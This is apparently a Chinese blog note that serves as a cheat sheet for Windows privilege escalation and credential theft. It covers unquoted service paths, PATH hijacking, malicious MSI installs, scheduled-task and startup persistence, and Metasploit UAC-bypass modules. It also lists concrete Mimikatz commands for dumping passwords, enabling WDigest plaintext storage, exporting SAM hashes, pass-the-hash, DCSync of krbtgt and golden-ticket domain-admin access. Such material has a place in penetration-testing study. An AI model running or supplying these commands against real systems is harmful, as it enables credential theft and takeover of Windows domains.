权限提升咯
权限提升
Windows下权限提升
1.缓存溢出漏洞
--查找对应的EXP
利用别人发布的漏洞https://www.exploit-db.com/ 找对应的漏洞编号
在msf里面search一下
利用其他windowsEXP扫描工具
2.配置出错提权
--Trusted service path
Windows 解析未带引号但是有空格的服务时,会尝试查找空格前的对应名字的程序
举例
C:\Program Files\Common Files\Services 会尝试访问 C:\Promgram.exe 和C:\Program Files\Common.exe
只要创建对应木马程序到对应位置就可以以服务System权限运行
--path 环境变量
path解析从上到下,如果此时因为配置错误在某些高权限程序的前面有其他文件路径
如 C:\Windows\System32\ipconfig.exe 前面有 D:\xxxx
我们可以制作木马ipconfig.exe 到 D:\xxxx 从而在管理员执行ipconfig时提权
3.MSI提权
如果windows安装设置为高权限就可以用msfenvom生成的msi拿到高权限
4.进程注入提权
meterperter 的migrate注入一些高权限的程序
5.计划任务,启动项提权
--利用at
at 12:33 /interactive cmd.exe
--利用schtasks
查看一些restart的程序 schtasks /query /fo list /v /tn restart
然后修改对应程序为木马
--启动项直接写入目录
C:\ ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
--启动项注册表
带有Run Runonce的注测表项
6.UAC提权
通过构造一些程序,询问管理员获得权限,从而提权,如图

在msf里面有 exploit/windows/local/bypassuac exploit/windows/loacal/ask 模块可以利用
7.Minikatz
--基本使用
#提升权限
privilege::debug
#抓取密码
sekurlsa::logonpasswords
明文保存密码
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
#重启或用户重新登录后可以成功抓取
--SAM表获得hash
#导出SAM数据
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM
#使用mimikatz提取hash
lsadump::sam /sam:SAM /system:SYSTEM
--hash传递
#使用administrator用户的NTLM哈希值进行攻击
sekurlsa::pth /user:administrator /domain:192.168.10.15 /ntlm:329153f560eb329c0e1deea55e88a1e9
--票据传递
mimikatz "lsadump::dcsync /domain:xx.com /user:krbtgt"
kerberos::golden /admin:administrator /domain:ABC.COM /sid:S-1-5-21-3912242732-2617380311-62526969 /krbtgt:c7af5cfc450e645ed4c46daa78fe18da /ticket:test.kiribi
#导入刚才生成的票据
kerberos::ptt test.kiribi
#导入成功后可获取域管权限
dir \\dc.abc.com\c$

浙公网安备 33010602011771号